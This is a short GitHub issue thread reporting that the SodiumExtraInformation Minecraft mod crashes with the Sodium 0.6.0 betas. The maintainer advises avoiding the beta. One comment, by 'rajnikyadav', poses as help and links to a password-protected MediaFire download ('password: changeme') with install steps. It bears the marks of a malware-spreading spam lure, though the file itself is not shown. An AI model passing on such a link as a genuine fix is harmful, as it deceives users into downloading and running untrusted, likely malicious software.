### ISSUE TITLE
Crashes when Video Settings is clicked

### ISSUE THREAD

**Issue by DTech10** [anviaan/SodiumExtraInformation#2]
Mod files:
[sodium-fabric-0.6.0-beta](https://www.curseforge.com/minecraft/mc-mods/sodium/files/5651872)
[sodium-extra-fabric-0.6.0-beta](https://www.curseforge.com/minecraft/mc-mods/sodium-extra/files/5654762)
SodiumExtraInformation-1.0

[Latest Log](https://mclo.gs/BjXQTwI)
[Crash Report](https://mclo.gs/6iB0qDC)

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by anviaan** [comment]
Don't use the beta for the moment

**Comment by nonokirby** [comment]
> Don't use the beta for the moment

personally feel like this should be mentioned more prominently, or the beta taken down from Curseforge, as this makes the mod unusable and would be confusing in large packs.
